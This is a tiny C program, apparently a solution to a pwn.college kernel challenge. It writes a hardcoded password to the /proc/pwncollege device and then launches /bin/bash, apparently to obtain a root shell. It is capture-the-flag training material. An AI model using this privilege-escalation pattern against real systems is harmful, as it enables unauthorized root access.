8 lines
200 B
C
8 lines
200 B
C
#include <stdlib.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
int main() {
|
|
int fd = open("/proc/pwncollege", O_WRONLY);
|
|
write(fd, "ysrxhmxtsfctmnuv", 0x10);
|
|
execve("/bin/bash", NULL, NULL);
|
|
} |